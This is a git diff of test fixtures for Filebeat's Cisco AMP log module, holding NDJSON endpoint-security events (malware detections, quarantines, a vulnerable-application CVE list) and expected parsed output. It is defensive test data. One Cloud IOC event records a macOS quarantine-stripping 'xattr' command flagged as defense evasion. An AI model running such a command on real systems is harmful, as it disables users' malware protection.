found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} -{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} -{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} -{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} 
-{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat 
Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-509
4"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115
","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2017-11216","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11216"},{"cve":"CVE-2017-11218","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11218"},{"cve":"CVE-2017-11219","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11219"},{"cve":"CVE-2017-11220","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11220"},{"cve":"CVE-2017-11221","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11221"},{"cve":"CVE-2017-11222","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11222"},{"cve":"CVE-2017-11223","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11223"},{"cve":"CVE-2017-11224","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11224"},{"cve":"CVE-2017-11226","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11226"},{"cve":"CVE-2017-11227","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11227"},{"cve":"CVE-2017-11228","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11228"},{"cve":"CVE-2017-11229","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11229"},{"cve":"CVE-2017-11234","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11234"},{"cve":"CVE-2017-11235","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11235"},{"cve":"CVE-2017-11237",
"score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11237"},{"cve":"CVE-2017-11241","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11241"},{"cve":"CVE-2017-11251","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11251"},{"cve":"CVE-2017-11254","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11254"},{"cve":"CVE-2017-11256","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11256"},{"cve":"CVE-2017-11257","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11257"},{"cve":"CVE-2017-11259","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11259"},{"cve":"CVE-2017-11260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11260"},{"cve":"CVE-2017-11261","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11261"},{"cve":"CVE-2017-11262","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11262"},{"cve":"CVE-2017-11263","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11263"},{"cve":"CVE-2017-11267","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11267"},{"cve":"CVE-2017-11269","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11269"},{"cve":"CVE-2017-11270","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11270"},{"cve":"CVE-2017-11271","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11271"}]}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json deleted file mode 100644 index 52efeb8e97b..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log-expected.json +++ /dev/null 
@@ -1,87 +0,0 @@
-[
- {
- "@timestamp": "2020-11-11T09:51:38.000Z",
- "cisco.amp.computer.active": true,
- "cisco.amp.computer.connector_guid": "1235-1234sdgf-654sdf-7562345",
- "cisco.amp.computer.external_ip": "8.8.8.8",
- "cisco.amp.computer.network_addresses": [
- {
- "ip": "192.168.196.22",
- "mac": "aa:d9:ac:af:1d:ad"
- },
- {
- "ip": "192.168.120.1",
- "mac": "12:24:56:c2:00:01"
- },
- {
- "ip": "192.168.160.1",
- "mac": "12:50:56:c2:53:08"
- }
- ],
- "cisco.amp.connector_guid": "1235-1234sdgf-654sdf-7562345",
- "cisco.amp.detection": "W32.Trojan.22gp.1201",
- "cisco.amp.detection_id": "12365423467",
- "cisco.amp.event_type_id": 1090519054,
- "cisco.amp.file.disposition": "Malicious",
- "cisco.amp.file.parent.disposition": "Unknown",
- "cisco.amp.group_guids": [
- "6542345gdfs-234-sdf2-34-6345243"
- ],
- "cisco.amp.related.mac": [
- "aa:d9:ac:af:1d:ad",
- "12:24:56:c2:00:01",
- "12:50:56:c2:53:08"
- ],
- "cisco.amp.timestamp_nanoseconds": 153000000,
- "event.action": "Threat Detected",
- "event.category": [
- "file",
- "malware"
- ],
- "event.dataset": "cisco.amp",
- "event.id": 123578990,
- "event.kind": "alert",
- "event.module": "cisco",
- "event.severity": 2,
- "file.hash.md5": "9a8557b98ed1469272fa0ace91d63477",
- "file.hash.sha1": "d0c4192b65e36553fvfd2b83f3113f6ae8390baa",
- "file.hash.sha256": "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc",
- "file.name": "HYXiN3hY.exe.part",
- "file.path": "\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part",
- "fileset.name": "amp",
- "host.hostname": "testhost",
- "host.name": "testhost",
- "host.os.family": "windows",
- "host.os.platform": "windows",
- "host.user.name": "user@domain",
- "input.type": "log",
- "log.offset": 0,
- "process.hash.md5": "e50ab86d5409d4d0ad386b27ea7f78fb",
- "process.hash.sha1": "d539afb0991e823c7cdf824b610a5a5d7655a2da",
- "process.hash.sha256": "a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab",
- "process.name": "firefox.exe",
- "process.pid": 88,
- "related.hash": [
- "e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc",
- "9a8557b98ed1469272fa0ace91d63477",
- "d0c4192b65e36553fvfd2b83f3113f6ae8390baa"
- ],
- "related.hosts": [
- "testhost"
- ],
- "related.ip": [
- "8.8.8.8",
- "192.168.196.22",
- "192.168.120.1",
- "192.168.160.1"
- ],
- "related.user": [
- "user@domain"
- ],
- "service.type": "cisco",
- "tags": [
- "cisco-amp",
- "forwarded"
- ]
- }
-]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log
new file mode 100644
index 00000000000..211de5d2bc9
--- /dev/null
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log
@@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a
8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5
e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud 
